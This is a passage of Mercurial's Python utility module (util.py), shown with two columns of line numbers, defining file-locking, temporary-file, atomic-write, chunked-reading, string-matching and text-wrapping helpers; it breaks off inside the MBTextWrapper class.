1696 1929 flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
1697 1930 ld = os.open(pathname, flags)
1698 1931 os.write(ld, info)
1699 1932 os.close(ld)
1700 1933
1701 1934 def readlock(pathname):
1702 1935 try:
1703 1936 return os.readlink(pathname)
1704 1937 except OSError as why:
1705 1938 if why.errno not in (errno.EINVAL, errno.ENOSYS):
1706 1939 raise
1707 1940 except AttributeError: # no symlink in os
1708 1941 pass
1709 1942 fp = posixfile(pathname, 'rb')
1710 1943 r = fp.read()
1711 1944 fp.close()
1712 1945 return r
1713 1946
1714 1947 def fstat(fp):
1715 1948 '''stat file object that may not have fileno method.'''
1716 1949 try:
1717 1950 return os.fstat(fp.fileno())
1718 1951 except AttributeError:
1719 1952 return os.stat(fp.name)
1720 1953
1721 1954 # File system features
1722 1955
1723 1956 def fscasesensitive(path):
1724 1957 """
1725 1958 Return true if the given path is on a case-sensitive filesystem
1726 1959
1727 1960 Requires a path (like /foo/.hg) ending with a foldable final
1728 1961 directory component.
1729 1962 """
1730 1963 s1 = os.lstat(path)
1731 1964 d, b = os.path.split(path)
1732 1965 b2 = b.upper()
1733 1966 if b == b2:
1734 1967 b2 = b.lower()
1735 1968 if b == b2:
1736 1969 return True # no evidence against case sensitivity
1737 1970 p2 = os.path.join(d, b2)
1738 1971 try:
1739 1972 s2 = os.lstat(p2)
1740 1973 if s2 == s1:
1741 1974 return False
1742 1975 return True
1743 1976 except OSError:
1744 1977 return True
1745 1978
1746 1979 try:
1747 1980 import re2
1748 1981 _re2 = None
1749 1982 except ImportError:
1750 1983 _re2 = False
1751 1984
1752 1985 class _re(object):
1753 1986 def _checkre2(self):
1754 1987 global _re2
1755 1988 try:
1756 1989 # check if match works, see issue3964
1757 1990 _re2 = bool(re2.match(r'\[([^\[]+)\]', '[ui]'))
1758 1991 except ImportError:
1759 1992 _re2 = False
1760 1993
1761 1994 def compile(self, pat, flags=0):
1762 1995 '''Compile a regular expression, using re2 if possible
1763 1996
1764 1997 For best performance, use only re2-compatible regexp features. The
1765 1998 only flags from the re module that are re2-compatible are
1766 1999 IGNORECASE and MULTILINE.'''
1767 2000 if _re2 is None:
1768 2001 self._checkre2()
1769 2002 if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
1770 2003 if flags & remod.IGNORECASE:
1771 2004 pat = '(?i)' + pat
1772 2005 if flags & remod.MULTILINE:
1773 2006 pat = '(?m)' + pat
1774 2007 try:
1775 2008 return re2.compile(pat)
1776 2009 except re2.error:
1777 2010 pass
1778 2011 return remod.compile(pat, flags)
1779 2012
1780 2013 @propertycache
1781 2014 def escape(self):
1782 2015 '''Return the version of escape corresponding to self.compile.
1783 2016
1784 2017 This is imperfect because whether re2 or re is used for a particular
1785 2018 function depends on the flags, etc, but it's the best we can do.
1786 2019 '''
1787 2020 global _re2
1788 2021 if _re2 is None:
1789 2022 self._checkre2()
1790 2023 if _re2:
1791 2024 return re2.escape
1792 2025 else:
1793 2026 return remod.escape
1794 2027
1795 2028 re = _re()
1796 2029
1797 2030 _fspathcache = {}
1798 2031 def fspath(name, root):
1799 2032 '''Get name in the case stored in the filesystem
1800 2033
1801 2034 The name should be relative to root, and be normcase-ed for efficiency.
1802 2035
1803 2036 Note that this function is unnecessary, and should not be
1804 2037 called, for case-sensitive filesystems (simply because it's expensive).
1805 2038
1806 2039 The root should be normcase-ed, too.
1807 2040 '''
1808 2041 def _makefspathcacheentry(dir):
1809 2042 return dict((normcase(n), n) for n in os.listdir(dir))
1810 2043
1811 2044 seps = pycompat.ossep
1812 2045 if pycompat.osaltsep:
1813 2046 seps = seps + pycompat.osaltsep
1814 2047 # Protect backslashes. This gets silly very quickly.
1815 2048 seps.replace('\\','\\\\')
1816 2049 pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
1817 2050 dir = os.path.normpath(root)
1818 2051 result = []
1819 2052 for part, sep in pattern.findall(name):
1820 2053 if sep:
1821 2054 result.append(sep)
1822 2055 continue
1823 2056
1824 2057 if dir not in _fspathcache:
1825 2058 _fspathcache[dir] = _makefspathcacheentry(dir)
1826 2059 contents = _fspathcache[dir]
1827 2060
1828 2061 found = contents.get(part)
1829 2062 if not found:
1830 2063 # retry "once per directory" per "dirstate.walk" which
1831 2064 # may take place for each patches of "hg qpush", for example
1832 2065 _fspathcache[dir] = contents = _makefspathcacheentry(dir)
1833 2066 found = contents.get(part)
1834 2067
1835 2068 result.append(found or part)
1836 2069 dir = os.path.join(dir, part)
1837 2070
1838 2071 return ''.join(result)
1839 2072
1840 2073 def checknlink(testfile):
1841 2074 '''check whether hardlink count reporting works properly'''
1842 2075
1843 2076 # testfile may be open, so we need a separate file for checking to
1844 2077 # work around issue2543 (or testfile may get lost on Samba shares)
1845 2078 f1, f2, fp = None, None, None
1846 2079 try:
1847 2080 fd, f1 = tempfile.mkstemp(prefix='.%s-' % os.path.basename(testfile),
1848 2081 suffix='1~', dir=os.path.dirname(testfile))
1849 2082 os.close(fd)
1850 2083 f2 = '%s2~' % f1[:-2]
1851 2084
1852 2085 oslink(f1, f2)
1853 2086 # nlinks() may behave differently for files on Windows shares if
1854 2087 # the file is open.
1855 2088 fp = posixfile(f2)
1856 2089 return nlinks(f2) > 1
1857 2090 except OSError:
1858 2091 return False
1859 2092 finally:
1860 2093 if fp is not None:
1861 2094 fp.close()
1862 2095 for f in (f1, f2):
1863 2096 try:
1864 2097 if f is not None:
1865 2098 os.unlink(f)
1866 2099 except OSError:
1867 2100 pass
1868 2101
1869 2102 def endswithsep(path):
1870 2103 '''Check path ends with os.sep or os.altsep.'''
1871 2104 return (path.endswith(pycompat.ossep)
1872 2105 or pycompat.osaltsep and path.endswith(pycompat.osaltsep))
1873 2106
1874 2107 def splitpath(path):
1875 2108 '''Split path by os.sep.
1876 2109 Note that this function does not use os.altsep because this is
1877 2110 an alternative of simple "xxx.split(os.sep)".
1878 2111 It is recommended to use os.path.normpath() before using this
1879 2112 function if need.'''
1880 2113 return path.split(pycompat.ossep)
1881 2114
1882 2115 def gui():
1883 2116 '''Are we running in a GUI?'''
1884 2117 if pycompat.isdarwin:
1885 2118 if 'SSH_CONNECTION' in encoding.environ:
1886 2119 # handle SSH access to a box where the user is logged in
1887 2120 return False
1888 2121 elif getattr(osutil, 'isgui', None):
1889 2122 # check if a CoreGraphics session is available
1890 2123 return osutil.isgui()
1891 2124 else:
1892 2125 # pure build; use a safe default
1893 2126 return True
1894 2127 else:
1895 2128 return pycompat.iswindows or encoding.environ.get("DISPLAY")
1896 2129
1897 2130 def mktempcopy(name, emptyok=False, createmode=None):
1898 2131 """Create a temporary file with the same contents from name
1899 2132
1900 2133 The permission bits are copied from the original file.
1901 2134
1902 2135 If the temporary file is going to be truncated immediately, you
1903 2136 can use emptyok=True as an optimization.
1904 2137
1905 2138 Returns the name of the temporary file.
1906 2139 """
1907 2140 d, fn = os.path.split(name)
1908 2141 fd, temp = tempfile.mkstemp(prefix='.%s-' % fn, suffix='~', dir=d)
1909 2142 os.close(fd)
1910 2143 # Temporary files are created with mode 0600, which is usually not
1911 2144 # what we want. If the original file already exists, just copy
1912 2145 # its mode. Otherwise, manually obey umask.
1913 2146 copymode(name, temp, createmode)
1914 2147 if emptyok:
1915 2148 return temp
1916 2149 try:
1917 2150 try:
1918 2151 ifp = posixfile(name, "rb")
1919 2152 except IOError as inst:
1920 2153 if inst.errno == errno.ENOENT:
1921 2154 return temp
1922 2155 if not getattr(inst, 'filename', None):
1923 2156 inst.filename = name
1924 2157 raise
1925 2158 ofp = posixfile(temp, "wb")
1926 2159 for chunk in filechunkiter(ifp):
1927 2160 ofp.write(chunk)
1928 2161 ifp.close()
1929 2162 ofp.close()
1930 2163 except: # re-raises
1931 2164 try:
1932 2165 os.unlink(temp)
1933 2166 except OSError:
1934 2167 pass
1935 2168 raise
1936 2169 return temp
1937 2170
1938 2171 class filestat(object):
1939 2172 """help to exactly detect change of a file
1940 2173
1941 2174 'stat' attribute is result of 'os.stat()' if specified 'path'
1942 2175 exists. Otherwise, it is None. This can avoid preparative
1943 2176 'exists()' examination on client side of this class.
1944 2177 """
1945 2178 def __init__(self, stat):
1946 2179 self.stat = stat
1947 2180
1948 2181 @classmethod
1949 2182 def frompath(cls, path):
1950 2183 try:
1951 2184 stat = os.stat(path)
1952 2185 except OSError as err:
1953 2186 if err.errno != errno.ENOENT:
1954 2187 raise
1955 2188 stat = None
1956 2189 return cls(stat)
1957 2190
1958 2191 @classmethod
1959 2192 def fromfp(cls, fp):
1960 2193 stat = os.fstat(fp.fileno())
1961 2194 return cls(stat)
1962 2195
1963 2196 __hash__ = object.__hash__
1964 2197
1965 2198 def __eq__(self, old):
1966 2199 try:
1967 2200 # if ambiguity between stat of new and old file is
1968 2201 # avoided, comparison of size, ctime and mtime is enough
1969 2202 # to exactly detect change of a file regardless of platform
1970 2203 return (self.stat.st_size == old.stat.st_size and
1971 2204 self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME] and
1972 2205 self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME])
1973 2206 except AttributeError:
1974 2207 pass
1975 2208 try:
1976 2209 return self.stat is None and old.stat is None
1977 2210 except AttributeError:
1978 2211 return False
1979 2212
1980 2213 def isambig(self, old):
1981 2214 """Examine whether new (= self) stat is ambiguous against old one
1982 2215
1983 2216 "S[N]" below means stat of a file at N-th change:
1984 2217
1985 2218 - S[n-1].ctime < S[n].ctime: can detect change of a file
1986 2219 - S[n-1].ctime == S[n].ctime
1987 2220 - S[n-1].ctime < S[n].mtime: means natural advancing (*1)
1988 2221 - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
1989 2222 - S[n-1].ctime > S[n].mtime: never occurs naturally (don't care)
1990 2223 - S[n-1].ctime > S[n].ctime: never occurs naturally (don't care)
1991 2224
1992 2225 Case (*2) above means that a file was changed twice or more at
1993 2226 same time in sec (= S[n-1].ctime), and comparison of timestamp
1994 2227 is ambiguous.
1995 2228
1996 2229 Base idea to avoid such ambiguity is "advance mtime 1 sec, if
1997 2230 timestamp is ambiguous".
1998 2231
1999 2232 But advancing mtime only in case (*2) doesn't work as
2000 2233 expected, because naturally advanced S[n].mtime in case (*1)
2001 2234 might be equal to manually advanced S[n-1 or earlier].mtime.
2002 2235
2003 2236 Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
2004 2237 treated as ambiguous regardless of mtime, to avoid overlooking
2005 2238 by confliction between such mtime.
2006 2239
2007 2240 Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
2008 2241 S[n].mtime", even if size of a file isn't changed.
2009 2242 """
2010 2243 try:
2011 2244 return (self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME])
2012 2245 except AttributeError:
2013 2246 return False
2014 2247
2015 2248 def avoidambig(self, path, old):
2016 2249 """Change file stat of specified path to avoid ambiguity
2017 2250
2018 2251 'old' should be previous filestat of 'path'.
2019 2252
2020 2253 This skips avoiding ambiguity, if a process doesn't have
2021 2254 appropriate privileges for 'path'. This returns False in this
2022 2255 case.
2023 2256
2024 2257 Otherwise, this returns True, as "ambiguity is avoided".
2025 2258 """
2026 2259 advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2027 2260 try:
2028 2261 os.utime(path, (advanced, advanced))
2029 2262 except OSError as inst:
2030 2263 if inst.errno == errno.EPERM:
2031 2264 # utime() on the file created by another user causes EPERM,
2032 2265 # if a process doesn't have appropriate privileges
2033 2266 return False
2034 2267 raise
2035 2268 return True
2036 2269
2037 2270 def __ne__(self, other):
2038 2271 return not self == other
2039 2272
2040 2273 class atomictempfile(object):
2041 2274 '''writable file object that atomically updates a file
2042 2275
2043 2276 All writes will go to a temporary copy of the original file. Call
2044 2277 close() when you are done writing, and atomictempfile will rename
2045 2278 the temporary copy to the original name, making the changes
2046 2279 visible. If the object is destroyed without being closed, all your
2047 2280 writes are discarded.
2048 2281
2049 2282 checkambig argument of constructor is used with filestat, and is
2050 2283 useful only if target file is guarded by any lock (e.g. repo.lock
2051 2284 or repo.wlock).
2052 2285 '''
2053 2286 def __init__(self, name, mode='w+b', createmode=None, checkambig=False):
2054 2287 self.__name = name # permanent name
2055 2288 self._tempname = mktempcopy(name, emptyok=('w' in mode),
2056 2289 createmode=createmode)
2057 2290 self._fp = posixfile(self._tempname, mode)
2058 2291 self._checkambig = checkambig
2059 2292
2060 2293 # delegated methods
2061 2294 self.read = self._fp.read
2062 2295 self.write = self._fp.write
2063 2296 self.seek = self._fp.seek
2064 2297 self.tell = self._fp.tell
2065 2298 self.fileno = self._fp.fileno
2066 2299
2067 2300 def close(self):
2068 2301 if not self._fp.closed:
2069 2302 self._fp.close()
2070 2303 filename = localpath(self.__name)
2071 2304 oldstat = self._checkambig and filestat.frompath(filename)
2072 2305 if oldstat and oldstat.stat:
2073 2306 rename(self._tempname, filename)
2074 2307 newstat = filestat.frompath(filename)
2075 2308 if newstat.isambig(oldstat):
2076 2309 # stat of changed file is ambiguous to original one
2077 2310 advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7fffffff
2078 2311 os.utime(filename, (advanced, advanced))
2079 2312 else:
2080 2313 rename(self._tempname, filename)
2081 2314
2082 2315 def discard(self):
2083 2316 if not self._fp.closed:
2084 2317 try:
2085 2318 os.unlink(self._tempname)
2086 2319 except OSError:
2087 2320 pass
2088 2321 self._fp.close()
2089 2322
2090 2323 def __del__(self):
2091 2324 if safehasattr(self, '_fp'): # constructor actually did something
2092 2325 self.discard()
2093 2326
2094 2327 def __enter__(self):
2095 2328 return self
2096 2329
2097 2330 def __exit__(self, exctype, excvalue, traceback):
2098 2331 if exctype is not None:
2099 2332 self.discard()
2100 2333 else:
2101 2334 self.close()
2102 2335
2103 2336 def unlinkpath(f, ignoremissing=False):
2104 2337 """unlink and remove the directory if it is empty"""
2105 2338 if ignoremissing:
2106 2339 tryunlink(f)
2107 2340 else:
2108 2341 unlink(f)
2109 2342 # try removing directories that might now be empty
2110 2343 try:
2111 2344 removedirs(os.path.dirname(f))
2112 2345 except OSError:
2113 2346 pass
2114 2347
2115 2348 def tryunlink(f):
2116 2349 """Attempt to remove a file, ignoring ENOENT errors."""
2117 2350 try:
2118 2351 unlink(f)
2119 2352 except OSError as e:
2120 2353 if e.errno != errno.ENOENT:
2121 2354 raise
2122 2355
2123 2356 def makedirs(name, mode=None, notindexed=False):
2124 2357 """recursive directory creation with parent mode inheritance
2125 2358
2126 2359 Newly created directories are marked as "not to be indexed by
2127 2360 the content indexing service", if ``notindexed`` is specified
2128 2361 for "write" mode access.
2129 2362 """
2130 2363 try:
2131 2364 makedir(name, notindexed)
2132 2365 except OSError as err:
2133 2366 if err.errno == errno.EEXIST:
2134 2367 return
2135 2368 if err.errno != errno.ENOENT or not name:
2136 2369 raise
2137 2370 parent = os.path.dirname(os.path.abspath(name))
2138 2371 if parent == name:
2139 2372 raise
2140 2373 makedirs(parent, mode, notindexed)
2141 2374 try:
2142 2375 makedir(name, notindexed)
2143 2376 except OSError as err:
2144 2377 # Catch EEXIST to handle races
2145 2378 if err.errno == errno.EEXIST:
2146 2379 return
2147 2380 raise
2148 2381 if mode is not None:
2149 2382 os.chmod(name, mode)
2150 2383
2151 2384 def readfile(path):
2152 2385 with open(path, 'rb') as fp:
2153 2386 return fp.read()
2154 2387
2155 2388 def writefile(path, text):
2156 2389 with open(path, 'wb') as fp:
2157 2390 fp.write(text)
2158 2391
2159 2392 def appendfile(path, text):
2160 2393 with open(path, 'ab') as fp:
2161 2394 fp.write(text)
2162 2395
2163 2396 class chunkbuffer(object):
2164 2397 """Allow arbitrary sized chunks of data to be efficiently read from an
2165 2398 iterator over chunks of arbitrary size."""
2166 2399
2167 2400 def __init__(self, in_iter):
2168 2401 """in_iter is the iterator that's iterating over the input chunks."""
2169 2402 def splitbig(chunks):
2170 2403 for chunk in chunks:
2171 2404 if len(chunk) > 2**20:
2172 2405 pos = 0
2173 2406 while pos < len(chunk):
2174 2407 end = pos + 2 ** 18
2175 2408 yield chunk[pos:end]
2176 2409 pos = end
2177 2410 else:
2178 2411 yield chunk
2179 2412 self.iter = splitbig(in_iter)
2180 2413 self._queue = collections.deque()
2181 2414 self._chunkoffset = 0
2182 2415
2183 2416 def read(self, l=None):
2184 2417 """Read L bytes of data from the iterator of chunks of data.
2185 2418 Returns less than L bytes if the iterator runs dry.
2186 2419
2187 2420 If size parameter is omitted, read everything"""
2188 2421 if l is None:
2189 2422 return ''.join(self.iter)
2190 2423
2191 2424 left = l
2192 2425 buf = []
2193 2426 queue = self._queue
2194 2427 while left > 0:
2195 2428 # refill the queue
2196 2429 if not queue:
2197 2430 target = 2**18
2198 2431 for chunk in self.iter:
2199 2432 queue.append(chunk)
2200 2433 target -= len(chunk)
2201 2434 if target <= 0:
2202 2435 break
2203 2436 if not queue:
2204 2437 break
2205 2438
2206 2439 # The easy way to do this would be to queue.popleft(), modify the
2207 2440 # chunk (if necessary), then queue.appendleft(). However, for cases
2208 2441 # where we read partial chunk content, this incurs 2 dequeue
2209 2442 # mutations and creates a new str for the remaining chunk in the
2210 2443 # queue. Our code below avoids this overhead.
2211 2444
2212 2445 chunk = queue[0]
2213 2446 chunkl = len(chunk)
2214 2447 offset = self._chunkoffset
2215 2448
2216 2449 # Use full chunk.
2217 2450 if offset == 0 and left >= chunkl:
2218 2451 left -= chunkl
2219 2452 queue.popleft()
2220 2453 buf.append(chunk)
2221 2454 # self._chunkoffset remains at 0.
2222 2455 continue
2223 2456
2224 2457 chunkremaining = chunkl - offset
2225 2458
2226 2459 # Use all of unconsumed part of chunk.
2227 2460 if left >= chunkremaining:
2228 2461 left -= chunkremaining
2229 2462 queue.popleft()
2230 2463 # offset == 0 is enabled by block above, so this won't merely
2231 2464 # copy via ``chunk[0:]``.
2232 2465 buf.append(chunk[offset:])
2233 2466 self._chunkoffset = 0
2234 2467
2235 2468 # Partial chunk needed.
2236 2469 else:
2237 2470 buf.append(chunk[offset:offset + left])
2238 2471 self._chunkoffset += left
2239 2472 left -= chunkremaining
2240 2473
2241 2474 return ''.join(buf)
2242 2475
2243 2476 def filechunkiter(f, size=131072, limit=None):
2244 2477 """Create a generator that produces the data in the file size
2245 2478 (default 131072) bytes at a time, up to optional limit (default is
2246 2479 to read all data). Chunks may be less than size bytes if the
2247 2480 chunk is the last chunk in the file, or the file is a socket or
2248 2481 some other type of file that sometimes reads less data than is
2249 2482 requested."""
2250 2483 assert size >= 0
2251 2484 assert limit is None or limit >= 0
2252 2485 while True:
2253 2486 if limit is None:
2254 2487 nbytes = size
2255 2488 else:
2256 2489 nbytes = min(limit, size)
2257 2490 s = nbytes and f.read(nbytes)
2258 2491 if not s:
2259 2492 break
2260 2493 if limit:
2261 2494 limit -= len(s)
2262 2495 yield s
2263 2496
2264 2497 class cappedreader(object):
2265 2498 """A file object proxy that allows reading up to N bytes.
2266 2499
2267 2500 Given a source file object, instances of this type allow reading up to
2268 2501 N bytes from that source file object. Attempts to read past the allowed
2269 2502 limit are treated as EOF.
2270 2503
2271 2504 It is assumed that I/O is not performed on the original file object
2272 2505 in addition to I/O that is performed by this instance. If there is,
2273 2506 state tracking will get out of sync and unexpected results will ensue.
2274 2507 """
2275 2508 def __init__(self, fh, limit):
2276 2509 """Allow reading up to <limit> bytes from <fh>."""
2277 2510 self._fh = fh
2278 2511 self._left = limit
2279 2512
2280 2513 def read(self, n=-1):
2281 2514 if not self._left:
2282 2515 return b''
2283 2516
2284 2517 if n < 0:
2285 2518 n = self._left
2286 2519
2287 2520 data = self._fh.read(min(n, self._left))
2288 2521 self._left -= len(data)
2289 2522 assert self._left >= 0
2290 2523
2291 2524 return data
2292 2525
2293 2526 def stringmatcher(pattern, casesensitive=True):
2294 2527 """
2295 2528 accepts a string, possibly starting with 're:' or 'literal:' prefix.
2296 2529 returns the matcher name, pattern, and matcher function.
2297 2530 missing or unknown prefixes are treated as literal matches.
2298 2531
2299 2532 helper for tests:
2300 2533 >>> def test(pattern, *tests):
2301 2534 ... kind, pattern, matcher = stringmatcher(pattern)
2302 2535 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2303 2536 >>> def itest(pattern, *tests):
2304 2537 ... kind, pattern, matcher = stringmatcher(pattern, casesensitive=False)
2305 2538 ... return (kind, pattern, [bool(matcher(t)) for t in tests])
2306 2539
2307 2540 exact matching (no prefix):
2308 2541 >>> test(b'abcdefg', b'abc', b'def', b'abcdefg')
2309 2542 ('literal', 'abcdefg', [False, False, True])
2310 2543
2311 2544 regex matching ('re:' prefix)
2312 2545 >>> test(b're:a.+b', b'nomatch', b'fooadef', b'fooadefbar')
2313 2546 ('re', 'a.+b', [False, False, True])
2314 2547
2315 2548 force exact matches ('literal:' prefix)
2316 2549 >>> test(b'literal:re:foobar', b'foobar', b're:foobar')
2317 2550 ('literal', 're:foobar', [False, True])
2318 2551
2319 2552 unknown prefixes are ignored and treated as literals
2320 2553 >>> test(b'foo:bar', b'foo', b'bar', b'foo:bar')
2321 2554 ('literal', 'foo:bar', [False, False, True])
2322 2555
2323 2556 case insensitive regex matches
2324 2557 >>> itest(b're:A.+b', b'nomatch', b'fooadef', b'fooadefBar')
2325 2558 ('re', 'A.+b', [False, False, True])
2326 2559
2327 2560 case insensitive literal matches
2328 2561 >>> itest(b'ABCDEFG', b'abc', b'def', b'abcdefg')
2329 2562 ('literal', 'ABCDEFG', [False, False, True])
2330 2563 """
2331 2564 if pattern.startswith('re:'):
2332 2565 pattern = pattern[3:]
2333 2566 try:
2334 2567 flags = 0
2335 2568 if not casesensitive:
2336 2569 flags = remod.I
2337 2570 regex = remod.compile(pattern, flags)
2338 2571 except remod.error as e:
2339 2572 raise error.ParseError(_('invalid regular expression: %s')
2340 2573 % e)
2341 2574 return 're', pattern, regex.search
2342 2575 elif pattern.startswith('literal:'):
2343 2576 pattern = pattern[8:]
2344 2577
2345 2578 match = pattern.__eq__
2346 2579
2347 2580 if not casesensitive:
2348 2581 ipat = encoding.lower(pattern)
2349 2582 match = lambda s: ipat == encoding.lower(s)
2350 2583 return 'literal', pattern, match
2351 2584
2352 2585 def shortuser(user):
2353 2586 """Return a short representation of a user name or email address."""
2354 2587 f = user.find('@')
2355 2588 if f >= 0:
2356 2589 user = user[:f]
2357 2590 f = user.find('<')
2358 2591 if f >= 0:
2359 2592 user = user[f + 1:]
2360 2593 f = user.find(' ')
2361 2594 if f >= 0:
2362 2595 user = user[:f]
2363 2596 f = user.find('.')
2364 2597 if f >= 0:
2365 2598 user = user[:f]
2366 2599 return user
2367 2600
2368 2601 def emailuser(user):
2369 2602 """Return the user portion of an email address."""
2370 2603 f = user.find('@')
2371 2604 if f >= 0:
2372 2605 user = user[:f]
2373 2606 f = user.find('<')
2374 2607 if f >= 0:
2375 2608 user = user[f + 1:]
2376 2609 return user
2377 2610
2378 2611 def email(author):
2379 2612 '''get email of author.'''
2380 2613 r = author.find('>')
2381 2614 if r == -1:
2382 2615 r = None
2383 2616 return author[author.find('<') + 1:r]
2384 2617
2385 2618 def ellipsis(text, maxlength=400):
2386 2619 """Trim string to at most maxlength (default: 400) columns in display."""
2387 2620 return encoding.trim(text, maxlength, ellipsis='...')
2388 2621
2389 2622 def unitcountfn(*unittable):
2390 2623 '''return a function that renders a readable count of some quantity'''
2391 2624
2392 2625 def go(count):
2393 2626 for multiplier, divisor, format in unittable:
2394 2627 if abs(count) >= divisor * multiplier:
2395 2628 return format % (count / float(divisor))
2396 2629 return unittable[-1][2] % count
2397 2630
2398 2631 return go
2399 2632
2400 2633 def processlinerange(fromline, toline):
2401 2634 """Check that linerange <fromline>:<toline> makes sense and return a
2402 2635 0-based range.
2403 2636
2404 2637 >>> processlinerange(10, 20)
2405 2638 (9, 20)
2406 2639 >>> processlinerange(2, 1)
2407 2640 Traceback (most recent call last):
2408 2641 ...
2409 2642 ParseError: line range must be positive
2410 2643 >>> processlinerange(0, 5)
2411 2644 Traceback (most recent call last):
2412 2645 ...
2413 2646 ParseError: fromline must be strictly positive
2414 2647 """
2415 2648 if toline - fromline < 0:
2416 2649 raise error.ParseError(_("line range must be positive"))
2417 2650 if fromline < 1:
2418 2651 raise error.ParseError(_("fromline must be strictly positive"))
2419 2652 return fromline - 1, toline
2420 2653
2421 2654 bytecount = unitcountfn(
2422 2655 (100, 1 << 30, _('%.0f GB')),
2423 2656 (10, 1 << 30, _('%.1f GB')),
2424 2657 (1, 1 << 30, _('%.2f GB')),
2425 2658 (100, 1 << 20, _('%.0f MB')),
2426 2659 (10, 1 << 20, _('%.1f MB')),
2427 2660 (1, 1 << 20, _('%.2f MB')),
2428 2661 (100, 1 << 10, _('%.0f KB')),
2429 2662 (10, 1 << 10, _('%.1f KB')),
2430 2663 (1, 1 << 10, _('%.2f KB')),
2431 2664 (1, 1, _('%.0f bytes')),
2432 2665 )
2433 2666
2434 2667 class transformingwriter(object):
2435 2668 """Writable file wrapper to transform data by function"""
2436 2669
2437 2670 def __init__(self, fp, encode):
2438 2671 self._fp = fp
2439 2672 self._encode = encode
2440 2673
2441 2674 def close(self):
2442 2675 self._fp.close()
2443 2676
2444 2677 def flush(self):
2445 2678 self._fp.flush()
2446 2679
2447 2680 def write(self, data):
2448 2681 return self._fp.write(self._encode(data))
2449 2682
2450 2683 # Matches a single EOL which can either be a CRLF where repeated CR
2451 2684 # are removed or a LF. We do not care about old Macintosh files, so a
2452 2685 # stray CR is an error.
2453 2686 _eolre = remod.compile(br'\r*\n')
2454 2687
2455 2688 def tolf(s):
2456 2689 return _eolre.sub('\n', s)
2457 2690
2458 2691 def tocrlf(s):
2459 2692 return _eolre.sub('\r\n', s)
2460 2693
2461 2694 def _crlfwriter(fp):
2462 2695 return transformingwriter(fp, tocrlf)
2463 2696
2464 2697 if pycompat.oslinesep == '\r\n':
2465 2698 tonativeeol = tocrlf
2466 2699 fromnativeeol = tolf
2467 2700 nativeeolwriter = _crlfwriter
2468 2701 else:
2469 2702 tonativeeol = pycompat.identity
2470 2703 fromnativeeol = pycompat.identity
2471 2704 nativeeolwriter = pycompat.identity
2472 2705
2473 2706 def escapestr(s):
2474 2707 # call underlying function of s.encode('string_escape') directly for
2475 2708 # Python 3 compatibility
2476 2709 return codecs.escape_encode(s)[0]
2477 2710
2478 2711 def unescapestr(s):
2479 2712 return codecs.escape_decode(s)[0]
2480 2713
2481 2714 def forcebytestr(obj):
2482 2715 """Portably format an arbitrary object (e.g. exception) into a byte
2483 2716 string."""
2484 2717 try:
2485 2718 return pycompat.bytestr(obj)
2486 2719 except UnicodeEncodeError:
2487 2720 # non-ascii string, may be lossy
2488 2721 return pycompat.bytestr(encoding.strtolocal(str(obj)))
2489 2722
2490 2723 def uirepr(s):
2491 2724 # Avoid double backslash in Windows path repr()
2492 2725 return pycompat.byterepr(pycompat.bytestr(s)).replace(b'\\\\', b'\\')
2493 2726
2494 2727 # delay import of textwrap
2495 2728 def MBTextWrapper(**kwargs):
2496 2729 class tw(textwrap.TextWrapper):
2497 2730 """
2498 2731 Extend TextWrapper for width-awareness.
2499 2732
2500 2733 Neither number of 'bytes' in any encoding nor 'characters' is
2501 2734 appropriate to calculate terminal columns for specified string.
2502 2735
2503 2736 Original TextWrapper implementation uses built-in 'len()' directly,
2504 2737 so overriding is needed to use width information of each characters.
2505 2738
2506 2739 In addition, characters classified into 'ambiguous' width are
2507 2740 treated as wide in East Asian area, but as narrow in other.
2508 2741
2509 2742 This requires use decision to determine width of such characters.
2510 2743 """
2511 2744 def _cutdown(self, ucstr, space_left):
2512 2745 l = 0
2513 2746 colwidth = encoding.ucolwidth
2514 2747 for i in xrange(len(ucstr)):
2515 2748 l += colwidth(ucstr[i])
2516 2749 if space_left < l:
2517 2750 return (ucstr[:i], ucstr[i:])
2518 2751 return ucstr, ''
2519 2752
2520 2753 # overriding of base class
2521 2754 def _handle_long_word(self, reversed_chunks, cur_line, cur_len, width):
2522 2755 space_left = max(width - cur_len, 1)
2523 2756
2524 2757 if self.break_long_words:
2525 2758 cut, res = self._cutdown(reversed_chunks[-1], space_left)
2526 2759 cur_line.append(cut)
2527 2760 reversed_chunks[-1] = res
2528 2761 elif not cur_line:
2529 2762 cur_line.append(reversed_chunks.pop())
2530 2763
2531 2764 # this overriding code is imported from TextWrapper of Python 2.6
2532 2765 # to calculate columns of string by 'encoding.ucolwidth()'
2533 2766 def _wrap_chunks(self, chunks):
2534 2767 colwidth = encoding.ucolwidth
2535 2768
2536 2769 lines = []
2537 2770 if self.width <= 0:
2538 2771 raise ValueError("invalid width %r (must be > 0)" % self.width)
2539 2772
2540 2773 # Arrange in reverse order so items can be efficiently popped
2541 2774 # from a stack of chucks.
2542 2775 chunks.reverse()
2543 2776
2544 2777 while chunks:
2545 2778
2546 2779 # Start the list of chunks that will make up the current line.
2547 2780 # cur_len is just the length of all the chunks in cur_line.
2548 2781 cur_line = []
2549 2782 cur_len = 0
2550 2783
2551 2784 # Figure out which static string will prefix this line.
2552 2785 if lines:
2553 2786 indent = self.subsequent_indent
2554 2787 else:
2555 2788 indent = self.initial_indent
2556 2789
2557 2790 # Maximum width for this line.
2558 2791 width = self.width - len(indent)
2559 2792
2560 2793 # First chunk on line is whitespace -- drop it, unless this
2561 2794 # is the very beginning of the text (i.e. no lines started yet).
2562 2795 if self.drop_whitespace and chunks[-1].strip() == r'' and lines:
2563 2796 del chunks[-1]
2564 2797
2565 2798 while chunks:
2566 2799 l = colwidth(chunks[-1])
2567 2800
2568 2801 # Can at least squeeze this chunk onto the current line.
2569 2802 if cur_len + l <= width:
2570 2803 cur_line.append(chunks.pop())
2571 2804 cur_len += l
2572 2805
2573 2806 # Nope, this line is full.
2574 2807 else:
2575 2808 break
2576 2809
